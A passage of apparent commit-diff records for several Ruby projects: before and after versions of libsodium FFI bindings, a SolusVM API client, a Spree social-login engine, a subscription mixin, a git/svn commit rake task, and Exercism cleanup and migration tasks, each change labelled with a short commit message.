    _install_constants klass, family, primitive, implementation, constants
    _install_methods klass, family, primitive, implementation, methods
  end

  # Creates e.g. Sodium::Auth::HMACSHA256 < Sodium::Auth.
  def self._define_subclass(scope, name)
    scope.const_set name, Class.new(scope)
  end

  # Sodium::Auth => "crypto_auth" (the NaCl C-symbol prefix).
  def self._extract_family_name(klass)
    'crypto_' + klass.name.split('::').last.downcase
  end

  # Registers the subclass in the family's implementation lookup table.
  def self._install_implementation(scope, klass, primitive)
    scope.implementations[primitive] = klass
  end

  # Copies each constant onto the subclass and mirrors it on this module
  # under a namespaced name (e.g. CRYPTO_AUTH_hmacsha256_BYTES).
  def self._install_constants(klass, family, primitive, implementation, constants)
    constants.each do |name, value|
      family = family.to_s.upcase
      name = name.to_s.upcase
      self. const_set("#{family}_#{primitive}_#{name}", value)
      klass.const_set(name, value)
    end
  end

  # Attaches each listed C function via FFI and wraps it in a singleton
  # method on the subclass (nacl, nacl_verify, ...) returning true when the
  # C call exits with status 0.
  def self._install_methods(klass, family, primitive, implementation, methods)
    methods.each do |name, arguments|
      nacl = self
      imp = [ family, primitive, implementation, name ].compact.join('_')
      meth = [ 'nacl', name ].compact.join('_')
      # the last element of `arguments` is the return type; the rest are params
      self.attach_function imp, arguments[0..-2], arguments.last
      (class << klass; self; end).send(:define_method, meth) do |*a, &b|
        nacl.send(imp, *a, &b) == 0
      end
    end
  end
end
# Concrete NaCl bindings: each nacl_family call below attaches the libsodium
# C functions for one primitive and defines its size constants; nacl_default
# marks the preferred primitive per family.
module Sodium::NaCl
  extend FFI::Library
  ffi_lib 'sodium'

  nacl_default Sodium::Auth, :hmacsha512256

  nacl_family Sodium::Auth, :HMACSHA256, :ref do |methods, constants|
    constants[:version] = '-'
    constants[:bytes] = 32
    constants[:keybytes] = 32
    # a nil key names the bare crypto_auth_* entry point (no suffix)
    methods[nil] = [ :pointer, :pointer, :ulong_long, :pointer, :int ]
    methods[:verify] = [ :pointer, :pointer, :ulong_long, :pointer, :int ]
  end

  nacl_family Sodium::Auth, :HMACSHA512256, :ref do |methods, constants|
    constants[:version] = '-'
    constants[:bytes] = 32
    constants[:keybytes] = 32
    methods[nil] = [ :pointer, :pointer, :ulong_long, :pointer, :int ]
    methods[:verify] = [ :pointer, :pointer, :ulong_long, :pointer, :int ]
  end

  nacl_default Sodium::Box, :curve25519xsalsa20poly1305

  nacl_family Sodium::Box, :Curve25519XSalsa20Poly1305, :ref do |methods, constants|
    constants[:version] = '-'
    constants[:publickeybytes] = 32
    constants[:secretkeybytes] = 32
    constants[:beforenmbytes] = 32
    constants[:noncebytes] = 24
    constants[:zerobytes] = 32
    constants[:boxzerobytes] = 16
    constants[:macbytes] = 16
    methods[nil] = [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :pointer, :int ]
    methods[:open] = [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :pointer, :int ]
    methods[:keypair] = [ :pointer, :pointer, :int ]
    methods[:beforenm] = [ :pointer, :pointer, :pointer, :int ]
    methods[:afternm] = [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :int ]
    methods[:open_afternm] = [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :int ]
  end
end
More cleanup
require 'sodium'
require 'ffi'
module Sodium::NaCl
  # Records the default primitive for a family class (e.g. Sodium::Auth).
  def self.nacl_default(klass, primitive)
    klass.const_set(:DEFAULT, primitive)
  end

  # Declares a NaCl primitive: defines a subclass of `scope`, registers it
  # as an implementation, and installs the constants and FFI-backed methods
  # described by the block. NOTE: unlike an earlier revision, the block is
  # yielded (constants, methods) -- in that order.
  def self.nacl_family(scope, subclass, implementation)
    klass = _define_subclass(scope, subclass)
    family = _extract_family_name(scope)
    primitive = subclass.to_s.downcase.to_sym
    methods = {}
    constants = {
      :implementation => implementation,
      :primitive => primitive
    }
    yield constants, methods
    _install_implementation scope, klass, primitive
    _install_constants klass, family, primitive, implementation, constants
    _install_methods klass, family, primitive, implementation, methods
  end

  # Creates e.g. Sodium::Auth::HMACSHA256 < Sodium::Auth.
  def self._define_subclass(scope, name)
    scope.const_set name, Class.new(scope)
  end

  # Sodium::Auth => "crypto_auth" (the NaCl C-symbol prefix).
  def self._extract_family_name(klass)
    'crypto_' + klass.name.split('::').last.downcase
  end

  # Registers the subclass in the family's implementation lookup table.
  def self._install_implementation(scope, klass, primitive)
    scope.implementations[primitive] = klass
  end

  # Copies each constant onto the subclass and mirrors it on this module
  # under a namespaced name (e.g. CRYPTO_AUTH_hmacsha256_BYTES).
  def self._install_constants(klass, family, primitive, implementation, constants)
    constants.each do |name, value|
      family = family.to_s.upcase
      name = name.to_s.upcase
      self. const_set("#{family}_#{primitive}_#{name}", value)
      klass.const_set(name, value)
    end
  end

  # Attaches each listed C function via FFI and wraps it in a singleton
  # method on the subclass (nacl, nacl_verify, ...) returning true when the
  # C call exits with status 0.
  def self._install_methods(klass, family, primitive, implementation, methods)
    methods.each do |name, arguments|
      nacl = self
      imp = [ family, primitive, implementation, name ].compact.join('_')
      meth = [ 'nacl', name ].compact.join('_')
      # the last element of `arguments` is the return type; the rest are params
      self.attach_function imp, arguments[0..-2], arguments.last
      (class << klass; self; end).send(:define_method, meth) do |*a, &b|
        nacl.send(imp, *a, &b) == 0
      end
    end
  end
end
# Concrete NaCl bindings: each nacl_family call attaches the libsodium C
# functions for one primitive and defines its size constants. The
# nacl_default calls at the bottom mark the preferred primitive per family.
module Sodium::NaCl
  extend FFI::Library
  ffi_lib 'sodium'

  nacl_family Sodium::Auth, :HMACSHA256, :ref do |constants, methods|
    constants.update(
      :version => '-',
      :bytes => 32,
      :keybytes => 32
    )
    # a nil key names the bare crypto_auth_* entry point (no suffix)
    methods.update(
      nil => [ :pointer, :pointer, :ulong_long, :pointer, :int ],
      :verify => [ :pointer, :pointer, :ulong_long, :pointer, :int ]
    )
  end

  nacl_family Sodium::Auth, :HMACSHA512256, :ref do |constants, methods|
    constants.update(
      :version => '-',
      :bytes => 32,
      :keybytes => 32
    )
    methods.update(
      nil => [ :pointer, :pointer, :ulong_long, :pointer, :int ],
      :verify => [ :pointer, :pointer, :ulong_long, :pointer, :int ]
    )
  end

  nacl_family Sodium::Box, :Curve25519XSalsa20Poly1305, :ref do |constants, methods|
    constants.update(
      :version => '-',
      :publickeybytes => 32,
      :secretkeybytes => 32,
      :beforenmbytes => 32,
      :noncebytes => 24,
      :zerobytes => 32,
      :boxzerobytes => 16,
      :macbytes => 16,
    )
    methods.update(
      nil => [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :pointer, :int ],
      :open => [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :pointer, :int ],
      :keypair => [ :pointer, :pointer, :int ],
      :beforenm => [ :pointer, :pointer, :pointer, :int ],
      :afternm => [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :int ],
      :open_afternm => [ :pointer, :pointer, :ulong_long, :pointer, :pointer, :int ],
    )
  end

  nacl_default Sodium::Auth, :hmacsha512256
  nacl_default Sodium::Box, :curve25519xsalsa20poly1305
end
|
module Solusvm
  # Solusvm::Base is the main class for mapping API resources as subclasses.
  class Base
    VALID_SERVER_TYPES = ["openvz", "xen", "xen hvm"].freeze

    # Hash of the most recently parsed API response.
    attr_reader :returned_parameters

    # Prepares and sends the API request to the URL specified in Solusvm.config
    #
    #   class MyClass < Base
    #     def create_server(name)
    #       perform_request(:action => "name", :id => 1)
    #     end
    #   end
    #
    # Options:
    # * <tt>:action</tt> - Specifies which API method to execute
    # All other options passed in are converted to http query arguments and are passed along to the API
    #
    # <tt>force_array</tt> - see parse_response
    #
    # Returns true when the API reports success (see #successful?).
    def perform_request(options = {}, force_array = false)
      ca_path = File.join(File.dirname(__FILE__), "..", "cacert.pem")
      ssl = {verify: true, ca_file: File.expand_path(ca_path)}
      response = Faraday.new(url: api_endpoint, ssl: ssl) do |c|
        c.params = options.merge(api_login)
        c.adapter :net_http
      end.get
      @returned_parameters = parse_response(response.status, response.body, force_array)
      log_messages(options)
      successful?
    end

    # Converts the XML response to a Hash
    #
    # <tt>force_array</tt> - Parses the xml element as an array; can be a string with the element name
    # or an array with element names
    def parse_response(status, body, force_array = false)
      parse_error(status, body) || begin
        force_array = Array(force_array) if force_array
        # wrap in a synthetic root so multiple top-level elements parse cleanly
        body = "<solusrequest>#{body}</solusrequest>"
        XmlSimple.xml_in(body, "ForceArray" => force_array)
      end
    end

    # Parses a returned_parameters value as a comma-separated list, if present.
    def parse_returned_params_as_list(attribute)
      if returned_parameters[attribute] && !returned_parameters[attribute].empty?
        returned_parameters[attribute].to_s.split(",")
      end
    end

    # Parses error responses. Returns an error hash for HTTP failures or known
    # application-level error bodies, or nil when the response looks healthy.
    def parse_error(status, body)
      if (200..299).include?(status)
        # Checks for application errors
        case body.downcase
        when /invalid ipaddress/i
          { "status" => "error", "statusmsg" => "This IP is not authorized to use the API" }
        when /Invalid id or key/i
          { "status" => "error", "statusmsg" => "Invalid ID or key" }
        when /Node not found/i
          { "status" => "error", "statusmsg" => "Node does not exist" }
        end
      else
        { "status" => "error", "statusmsg" => "Bad HTTP Status: #{status}" }
      end
    end

    # Returns true when a request has been successful
    #
    #   my_class = MyClass.new
    #   my_class.create_server("example.com")
    #   my_class.successful? # => true
    def successful?
      returned_parameters["status"].nil? || returned_parameters["status"] == "success"
    end

    # URI parsed API URL
    def api_endpoint
      Solusvm.api_endpoint.dup
    end

    # Credentials hash merged into every request.
    def api_login
      {id: Solusvm.api_id, key: Solusvm.api_key}
    end

    # Writes the request action and parsed response to the configured logger.
    def log_messages(options)
      logger, logger_method = Solusvm.api_options[:logger], Solusvm.api_options[:logger_method]
      if logger && logger.respond_to?(logger_method)
        logger.send(logger_method, "[Start] => #{options[:action]}")
        returned_parameters.each do |k,v|
          logger.send(logger_method, " #{k} => #{v}")
        end
        logger.send(logger_method, "[End] => #{options[:action]}")
      end
    end

    # API response message
    def statusmsg
      returned_parameters["statusmsg"]
    end

    # Validates the server type, yielding when valid. On an invalid type,
    # populates returned_parameters with an error and returns false.
    # (Fix: dropped the `valid =` assignment, which was never read, and the
    # unused &block parameter -- the block is invoked via yield.)
    def validate_server_type(type)
      type = type.strip
      if VALID_SERVER_TYPES.include?(type)
        yield
      else
        @returned_parameters = {
          "status" => "error",
          "statusmsg" => "Invalid Virtual Server type: #{type}"
        }
        false
      end
    end
  end
end
remove unused variable
module Solusvm
  # Solusvm::Base is the main class for mapping API resources as subclasses.
  class Base
    VALID_SERVER_TYPES = ["openvz", "xen", "xen hvm"].freeze

    # Hash of the most recently parsed API response.
    attr_reader :returned_parameters

    # Prepares and sends the API request to the URL specified in Solusvm.config
    #
    #   class MyClass < Base
    #     def create_server(name)
    #       perform_request(:action => "name", :id => 1)
    #     end
    #   end
    #
    # Options:
    # * <tt>:action</tt> - Specifies which API method to execute
    # All other options passed in are converted to http query arguments and are passed along to the API
    #
    # <tt>force_array</tt> - see parse_response
    #
    # Returns true when the API reports success (see #successful?).
    def perform_request(options = {}, force_array = false)
      ca_path = File.join(File.dirname(__FILE__), "..", "cacert.pem")
      ssl = {verify: true, ca_file: File.expand_path(ca_path)}
      response = Faraday.new(url: api_endpoint, ssl: ssl) do |c|
        c.params = options.merge(api_login)
        c.adapter :net_http
      end.get
      @returned_parameters = parse_response(response.status, response.body, force_array)
      log_messages(options)
      successful?
    end

    # Converts the XML response to a Hash
    #
    # <tt>force_array</tt> - Parses the xml element as an array; can be a string with the element name
    # or an array with element names
    def parse_response(status, body, force_array = false)
      parse_error(status, body) || begin
        force_array = Array(force_array) if force_array
        # wrap in a synthetic root so multiple top-level elements parse cleanly
        body = "<solusrequest>#{body}</solusrequest>"
        XmlSimple.xml_in(body, "ForceArray" => force_array)
      end
    end

    # Parses a returned_parameters value as a comma-separated list, if present.
    def parse_returned_params_as_list(attribute)
      if returned_parameters[attribute] && !returned_parameters[attribute].empty?
        returned_parameters[attribute].to_s.split(",")
      end
    end

    # Parses error responses. Returns an error hash for HTTP failures or known
    # application-level error bodies, or nil when the response looks healthy.
    def parse_error(status, body)
      if (200..299).include?(status)
        # Checks for application errors
        case body.downcase
        when /invalid ipaddress/i
          { "status" => "error", "statusmsg" => "This IP is not authorized to use the API" }
        when /Invalid id or key/i
          { "status" => "error", "statusmsg" => "Invalid ID or key" }
        when /Node not found/i
          { "status" => "error", "statusmsg" => "Node does not exist" }
        end
      else
        { "status" => "error", "statusmsg" => "Bad HTTP Status: #{status}" }
      end
    end

    # Returns true when a request has been successful
    #
    #   my_class = MyClass.new
    #   my_class.create_server("example.com")
    #   my_class.successful? # => true
    def successful?
      returned_parameters["status"].nil? || returned_parameters["status"] == "success"
    end

    # URI parsed API URL
    def api_endpoint
      Solusvm.api_endpoint.dup
    end

    # Credentials hash merged into every request.
    def api_login
      {id: Solusvm.api_id, key: Solusvm.api_key}
    end

    # Writes the request action and parsed response to the configured logger.
    def log_messages(options)
      logger, logger_method = Solusvm.api_options[:logger], Solusvm.api_options[:logger_method]
      if logger && logger.respond_to?(logger_method)
        logger.send(logger_method, "[Start] => #{options[:action]}")
        returned_parameters.each do |k,v|
          logger.send(logger_method, " #{k} => #{v}")
        end
        logger.send(logger_method, "[End] => #{options[:action]}")
      end
    end

    # API response message
    def statusmsg
      returned_parameters["statusmsg"]
    end

    # Validates the server type, yielding when valid. On an invalid type,
    # populates returned_parameters with an error and returns false.
    # (Fix: dropped the unused &block parameter -- the method uses yield, so
    # capturing the block only allocated a needless Proc.)
    def validate_server_type(type)
      type = type.strip
      if VALID_SERVER_TYPES.include?(type)
        yield
      else
        @returned_parameters = {
          "status" => "error",
          "statusmsg" => "Invalid Virtual Server type: #{type}"
        }
        false
      end
    end
  end
end
|
require 'spree_core'
require 'spree_auth'
require 'omniauth/oauth'
require "spree_social_hooks"
module SpreeSocial
  # [display name, omniauth provider key] pairs offered for configuration.
  OAUTH_PROVIDERS = [
    ["Bit.ly", "bitly"], ["Evernote", "evernote"], ["Facebook", "facebook"], ["Foursquare", "foursquare"],
    ["Github", "github"], ["Google", "google"], ["Gowalla", "gowalla"], ["instagr.am", "instagram"],
    ["Instapaper", "instapaper"], ["LinkedIn", "linked_in"], ["37Signals (Basecamp, Campfire, etc)", "thirty_seven_signals"],
    ["Twitter", "twitter"], ["Vimeo", "vimeo"], ["Yahoo!", "yahoo"], ["YouTube", "you_tube"]
  ]

  class Engine < Rails::Engine
    # Loads decorator files; `load` (not `require`) outside production so
    # they are re-applied on each code reload.
    def self.activate
      Dir.glob(File.join(File.dirname(__FILE__), "../app/**/*_decorator*.rb")) do |c|
        Rails.env.production? ? require(c) : load(c)
      end
      Ability.register_ability(SocialAbility)
    end
    config.to_prepare(&method(:activate).to_proc)
  end

  # We are setting these providers up regardless
  # This way we can update them when and where necessary
  def self.init_provider(provider)
    key, secret = nil
    AuthenticationMethod.where(:environment => ::Rails.env).each do |user|
      if user.preferred_provider == provider
        key = user.preferred_api_key
        secret = user.preferred_api_secret
        puts("[Spree Social] Loading #{user.preferred_provider.capitalize} as authentication source")
      end
    end if table_exists?("authentication_methods") # See Below for explanation
    self.setup_key_for(provider.to_sym, key, secret)
  end

  # Registers the provider's key/secret with Devise's omniauth config.
  def self.setup_key_for(provider, key, secret)
    Devise.setup do |oa|
      oa.omniauth provider.to_sym, key, secret
    end
  end

  # Coming soon to a server near you: no restart to get new keys setup
  #def self.reset_key_for(provider, *args)
  #  puts "ARGS: #{args}"
  #  Devise.omniauth_configs[provider] = Devise::OmniAuth::Config.new(provider, args)
  #  #oa_updated_provider
  #  #Devise.omniauth_configs.merge!(oa_updated_provider)
  #  puts "OmniAuth #{provider}: #{Devise.omniauth_configs[provider.to_sym].inspect}"
  #end

  # Have to test for this cause Rails migrations and initial setups will fail
  # before the table exists.
  # Fix: the bare `private` keyword has no effect on `def self.` methods, so
  # this was silently public; private_class_method actually hides it. The
  # call site above now uses an implicit receiver so the call stays legal.
  def self.table_exists?(name)
    ActiveRecord::Base.connection.tables.include?(name)
  end
  private_class_method :table_exists?
end
Update spree_social.rb
require 'spree_core'
require 'spree_auth'
require 'omniauth/oauth'
require "spree_social_hooks"
module SpreeSocial
  # [display name, omniauth provider key] pairs offered for configuration.
  OAUTH_PROVIDERS = [
    ["Bit.ly", "bitly"], ["Evernote", "evernote"], ["Facebook", "facebook"], ["Foursquare", "foursquare"],
    ["Github", "github"], ["Google", "google"], ["Gowalla", "gowalla"], ["instagr.am", "instagram"],
    ["Instapaper", "instapaper"], ["LinkedIn", "linked_in"], ["37Signals (Basecamp, Campfire, etc)", "thirty_seven_signals"],
    ["Twitter", "twitter"], ["Vimeo", "vimeo"], ["Yahoo!", "yahoo"], ["YouTube", "you_tube"],
    ["Vkontakte", "vkontakte"]
  ]

  class Engine < Rails::Engine
    # Loads decorator files; `load` (not `require`) outside production so
    # they are re-applied on each code reload.
    def self.activate
      Dir.glob(File.join(File.dirname(__FILE__), "../app/**/*_decorator*.rb")) do |c|
        Rails.env.production? ? require(c) : load(c)
      end
      Ability.register_ability(SocialAbility)
    end
    config.to_prepare(&method(:activate).to_proc)
  end

  # We are setting these providers up regardless
  # This way we can update them when and where necessary
  def self.init_provider(provider)
    key, secret = nil
    AuthenticationMethod.where(:environment => ::Rails.env).each do |user|
      if user.preferred_provider == provider
        key = user.preferred_api_key
        secret = user.preferred_api_secret
        puts("[Spree Social] Loading #{user.preferred_provider.capitalize} as authentication source")
      end
    end if table_exists?("authentication_methods") # See Below for explanation
    self.setup_key_for(provider.to_sym, key, secret)
  end

  # Registers the provider's key/secret with Devise's omniauth config.
  def self.setup_key_for(provider, key, secret)
    Devise.setup do |oa|
      oa.omniauth provider.to_sym, key, secret
    end
  end

  # Coming soon to a server near you: no restart to get new keys setup
  #def self.reset_key_for(provider, *args)
  #  puts "ARGS: #{args}"
  #  Devise.omniauth_configs[provider] = Devise::OmniAuth::Config.new(provider, args)
  #  #oa_updated_provider
  #  #Devise.omniauth_configs.merge!(oa_updated_provider)
  #  puts "OmniAuth #{provider}: #{Devise.omniauth_configs[provider.to_sym].inspect}"
  #end

  # Have to test for this cause Rails migrations and initial setups will fail
  # before the table exists.
  # Fix: the bare `private` keyword has no effect on `def self.` methods, so
  # this was silently public; private_class_method actually hides it. The
  # call site above now uses an implicit receiver so the call stays legal.
  def self.table_exists?(name)
    ActiveRecord::Base.connection.tables.include?(name)
  end
  private_class_method :table_exists?
end
|
# Mixin giving a model per-person subscriptions plus default-subscription
# bootstrapping based on each person's project-level preferences.
module Subscribable
  def self.included klass
    klass.class_eval do
      has_many :subscriptions, :as => :subscribable, :dependent => :destroy, :autosave => true
      before_create :set_default_subscriptions
      extend ClassMethods
    end
  end

  # The current user's subscription record for this item, if any.
  def current_users_subscription
    subscriptions.detect { |ss| ss.person == User.current_user.person }
  end

  def subscribed?
    !current_users_subscription.nil?
  end

  # Boolean writer so forms can toggle the subscription with a checkbox.
  def subscribed= subscribed
    if subscribed
      subscribe
    else
      unsubscribe
    end
  end

  # Builds (does not save) a subscription for the current user; relies on
  # the association's :autosave to persist it with the record.
  def subscribe
    subscriptions.build :person => User.current_user.person, :project => project unless subscribed?
  end

  def unsubscribe
    current_users_subscription.try(:destroy)
  end

  # Emails every "immediate" subscriber about the given activity log entry.
  def send_immediate_subscriptions activity_log
    subscriptions.each do |subscription|
      if subscription.immediately? and subscribers_are_notified_of? activity_log.action
        SubMailer.deliver_send_immediate_subscription subscription.person, activity_log
      end
    end
  end

  def subscribers_are_notified_of? action
    self.class.subscribers_are_notified_of? action
  end

  # before_create hook: subscribe everyone who subscribes to this item's
  # project, unless they opted out of this class of item.
  def set_default_subscriptions
    Person.all.each do |person|
      if project_subscription = person.project_subscriptions.detect {|s| s.project == self.project}
        subscriptions.build :person => person unless project_subscription.unsubscribed_types.include? self.class.name
      end
    end
  end

  module ClassMethods
    # Read-only actions do not generate notifications.
    def subscribers_are_notified_of? action
      action != 'show' and action != 'download'
    end
  end
end
ActiveRecord::Base.class_eval do
  class << self
    # True when this model class mixes in Subscribable.
    def subscribable?
      include?(Subscribable)
    end
  end

  # Instance-level convenience; defers to the class-level predicate.
  def subscribable?
    self.class.subscribable?
  end
end
corrected typo in method name
# Mixin giving a model per-person subscriptions plus default-subscription
# bootstrapping based on each person's project-level preferences.
module Subscribable
  def self.included klass
    klass.class_eval do
      has_many :subscriptions, :as => :subscribable, :dependent => :destroy, :autosave => true
      before_create :set_default_subscriptions
      extend ClassMethods
    end
  end

  # The current user's subscription record for this item, if any.
  def current_users_subscription
    subscriptions.detect { |ss| ss.person == User.current_user.person }
  end

  def subscribed?
    !current_users_subscription.nil?
  end

  # Boolean writer so forms can toggle the subscription with a checkbox.
  def subscribed= subscribed
    if subscribed
      subscribe
    else
      unsubscribe
    end
  end

  # Builds (does not save) a subscription for the current user; relies on
  # the association's :autosave to persist it with the record.
  def subscribe
    subscriptions.build :person => User.current_user.person, :project => project unless subscribed?
  end

  def unsubscribe
    current_users_subscription.try(:destroy)
  end

  # Emails every "immediate" subscriber about the given activity log entry.
  def send_immediate_subscription activity_log
    subscriptions.each do |subscription|
      if subscription.immediately? and subscribers_are_notified_of? activity_log.action
        SubMailer.deliver_send_immediate_subscription subscription.person, activity_log
      end
    end
  end

  def subscribers_are_notified_of? action
    self.class.subscribers_are_notified_of? action
  end

  # before_create hook: subscribe everyone who subscribes to this item's
  # project, unless they opted out of this class of item.
  def set_default_subscriptions
    Person.all.each do |person|
      if project_subscription = person.project_subscriptions.detect {|s| s.project == self.project}
        subscriptions.build :person => person unless project_subscription.unsubscribed_types.include? self.class.name
      end
    end
  end

  module ClassMethods
    # Read-only actions do not generate notifications.
    def subscribers_are_notified_of? action
      action != 'show' and action != 'download'
    end
  end
end
# Extends every ActiveRecord model with a `subscribable?` predicate that
# reports whether the Subscribable mixin is present.
ActiveRecord::Base.class_eval do
  # Class-level check: does this model include Subscribable?
  def self.subscribable?
    include?(Subscribable)
  end

  # Instance-level check, delegated to the class.
  def subscribable?
    self.class.subscribable?
  end
end
puts __FILE__ if defined?(DEBUG)
desc 'commits source files to git or subversion'
# NOTE(review): both branches register an identical :commit task, so the
# File.exists?('git') check has no effect -- and a git working copy is
# normally detected via '.git' (as Commit#update does). Confirm intent.
if(File.exists?('git'))
task :commit=>[:add] do Tasks.execute_task :commit; end
else
task :commit=>[:add] do Tasks.execute_task :commit;end
end
# Accumulates the shell commands needed to commit pending work in the
# current directory's git and/or subversion working copy. Commands are
# queued via add_quiet (provided by the enclosing task framework).
class Commit < Array
  # Inspects repository state and queues the appropriate commit command.
  # Uses commit.message as the message when present; when the
  # REQUIRE_COMMIT_MESSAGE constant is defined, an empty message aborts.
  def update
    message = ""
    message = IO.read('commit.message').strip if File.exist?('commit.message')
    if File.exist?('.git') && `git config --list`.include?('user.name=') && Git.user_email.length > 0
      # Fixed: git prints "no changes added to commit"; the previous string
      # ("no changes add to commit") could never match the status output.
      if !`git status`.include?('nothing to commit') &&
         !`git status`.include?('untracked files present') &&
         !`git status`.include?('no changes added to commit')
        if message.length == 0
          if defined?(REQUIRE_COMMIT_MESSAGE)
            Commit.reset_commit_message
            raise "commit.message required to perform commit"
          else
            add_quiet "git commit -m'all'"
          end
        else
          add_quiet "git commit -a -v --file commit.message"
          add_quiet "<%Commit.reset_commit_message%>"
        end
      end
    end
    if File.exist?('.svn')
      if message.length == 0
        if defined?(REQUIRE_COMMIT_MESSAGE)
          Commit.reset_commit_message
          raise "commit.message required to perform commit"
        else
          add_quiet 'svn commit -m"commit all"'
        end
      else
        add_quiet 'svn commit --file commit.message'
        add_quiet "<%Commit.reset_commit_message%>"
      end
    end
  end

  # Truncates commit.message so a stale message is not reused next time.
  # (File.exists? replaced by File.exist? -- the alias was removed in Ruby 3.2.)
  def self.reset_commit_message
    File.open('commit.message', 'w') { |f| f.write('') }
  end
end
'all'
puts __FILE__ if defined?(DEBUG)
desc 'commits source files to git or subversion'
# NOTE(review): the two branches register identical :commit tasks, so this
# File.exists?('git') check is a no-op; git checkouts are usually detected
# via '.git' (compare Commit#update below). Confirm intent.
if(File.exists?('git'))
task :commit=>[:add] do Tasks.execute_task :commit; end
else
task :commit=>[:add] do Tasks.execute_task :commit;end
end
# Accumulates the shell commands required to commit pending changes to a
# git and/or subversion working copy in the current directory.
class Commit < Array
# Queues a commit command appropriate to the repository state and the
# contents of commit.message (required when REQUIRE_COMMIT_MESSAGE is set).
def update
message=""
message=IO.read('commit.message').strip if File.exists?('commit.message')
if(File.exists?('.git') && `git config --list`.include?('user.name=') && Git.user_email.length > 0)
# NOTE(review): git prints "no changes added to commit"; the third string
# below ("no changes add to commit") will never match -- confirm intent.
if(!`git status`.include?('nothing to commit') &&
!`git status`.include?('untracked files present') &&
!`git status`.include?('no changes add to commit'))
if(message.length==0)
if(defined?(REQUIRE_COMMIT_MESSAGE))
Commit.reset_commit_message
raise "commit.message required to perform commit"
else
# NOTE(review): every other command in this class is queued via
# add_quiet; confirm add_passive exists -- this looks like a typo.
add_passive "git commit -m'all'"
end
else
add_quiet "git commit -a -v --file commit.message"
add_quiet "<%Commit.reset_commit_message%>"
end
end
end
if(File.exists?('.svn'))
if(message.length==0)
if(defined?(REQUIRE_COMMIT_MESSAGE))
Commit.reset_commit_message
raise "commit.message required to perform commit"
else
add_quiet 'svn commit -m"commit all"'
end
else
add_quiet 'svn commit --file commit.message'
add_quiet "<%Commit.reset_commit_message%>"
end
end
end
# Empties commit.message so the message is not reused on the next commit.
def self.reset_commit_message
File.open('commit.message','w'){|f|f.write('')}
end
end
# Maintenance tasks: cleanup of orphaned rows and one-off data migrations.
namespace :data do
namespace :cleanup do
desc "delete orphan notifications"
# Removes notifications pointing at submissions that no longer exist.
task :notifications do
require 'active_record'
require 'db/connection'
DB::Connection.establish
sql = <<-SQL
DELETE FROM notifications WHERE id IN (
SELECT n.id
FROM notifications n
LEFT JOIN submissions s ON n.item_id=s.id
WHERE n.item_type='Submission'
AND s.id IS NULL
)
SQL
ActiveRecord::Base.connection.execute(sql)
end
end
namespace :migrate do
desc "migrate deprecated problems"
# Moves each user's exercises (and their submissions) from a deprecated
# slug to its replacement, unless the user already has the replacement.
task :deprecated_problems do
require 'bundler'
Bundler.require
require_relative '../exercism'
# in Ruby
{
'point-mutations' => 'hamming'
}.each do |deprecated, replacement|
UserExercise.where(language: 'ruby', slug: deprecated).each do |exercise|
unless UserExercise.where(language: 'ruby', slug: replacement, user_id: exercise.user_id).count > 0
exercise.slug = replacement
exercise.save
exercise.submissions.each do |submission|
submission.slug = replacement
submission.save
end
end
end
end
end
# SQL backfill: a 'joined' lifecycle event from each user's creation time.
def joined_at
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT id, 'joined', created_at, created_at, created_at
FROM users
SQL
end
# SQL backfill: a lifecycle event named +key+ from each user's earliest submission.
def earliest_submission(key)
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT user_id, '#{key}', MIN(created_at), MIN(created_at), MIN(created_at)
FROM submissions s
GROUP BY user_id
SQL
end
# SQL backfill: 'commented' events from the earliest comment a user left on
# someone else's submission.
def earliest_comment_given
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT c.user_id, 'commented', MIN(c.created_at), MIN(c.created_at), MIN(c.created_at)
FROM comments c
INNER JOIN submissions s
ON c.submission_id=s.id
WHERE s.user_id != c.user_id
GROUP BY c.user_id
SQL
end
# SQL backfill: 'received_feedback' events from the earliest comment someone
# else left on a user's own submission.
def earliest_comment_received
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT s.user_id, 'received_feedback', MIN(c.created_at), MIN(c.created_at), MIN(c.created_at)
FROM comments c
INNER JOIN submissions s
ON c.submission_id=s.id
WHERE s.user_id != c.user_id
GROUP BY s.user_id
SQL
end
# SQL backfill: 'completed' events from each user's earliest completed submission.
def earliest_submission_completed
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT s.user_id, 'completed', MIN(s.done_at), MIN(s.done_at), MIN(s.done_at)
FROM submissions s
WHERE s.done_at IS NOT NULL
GROUP BY s.user_id
SQL
end
desc "migrate lifecycle events"
# Runs every lifecycle backfill defined above against the users database.
task :lifecycle do
require 'bundler'
Bundler.require
require_relative '../exercism'
User.connection.execute(joined_at)
# We're missing data for 'fetch'. Inserting submit as placeholder.
User.connection.execute(earliest_submission('fetched'))
User.connection.execute(earliest_submission('submitted'))
User.connection.execute(earliest_comment_received)
User.connection.execute(earliest_comment_given)
User.connection.execute(earliest_submission_completed)
end
end
end
Add cleanup task for orphan comments (comments whose parent submission no longer exists).
# Maintenance tasks: cleanup of orphaned rows and one-off data migrations.
namespace :data do
namespace :cleanup do
desc "delete orphan comments"
# Removes comments whose submission has been deleted.
task :comments do
require 'active_record'
require 'db/connection'
DB::Connection.establish
sql = <<-SQL
DELETE FROM comments WHERE id IN (
SELECT c.id
FROM comments c
LEFT JOIN submissions s ON c.submission_id=s.id
WHERE s.id IS NULL
)
SQL
ActiveRecord::Base.connection.execute(sql)
end
end
namespace :migrate do
desc "migrate deprecated problems"
# Moves each user's exercises (and their submissions) from a deprecated
# slug to its replacement, unless the user already has the replacement.
task :deprecated_problems do
require 'bundler'
Bundler.require
require_relative '../exercism'
# in Ruby
{
'point-mutations' => 'hamming'
}.each do |deprecated, replacement|
UserExercise.where(language: 'ruby', slug: deprecated).each do |exercise|
unless UserExercise.where(language: 'ruby', slug: replacement, user_id: exercise.user_id).count > 0
exercise.slug = replacement
exercise.save
exercise.submissions.each do |submission|
submission.slug = replacement
submission.save
end
end
end
end
end
# SQL backfill: a 'joined' lifecycle event from each user's creation time.
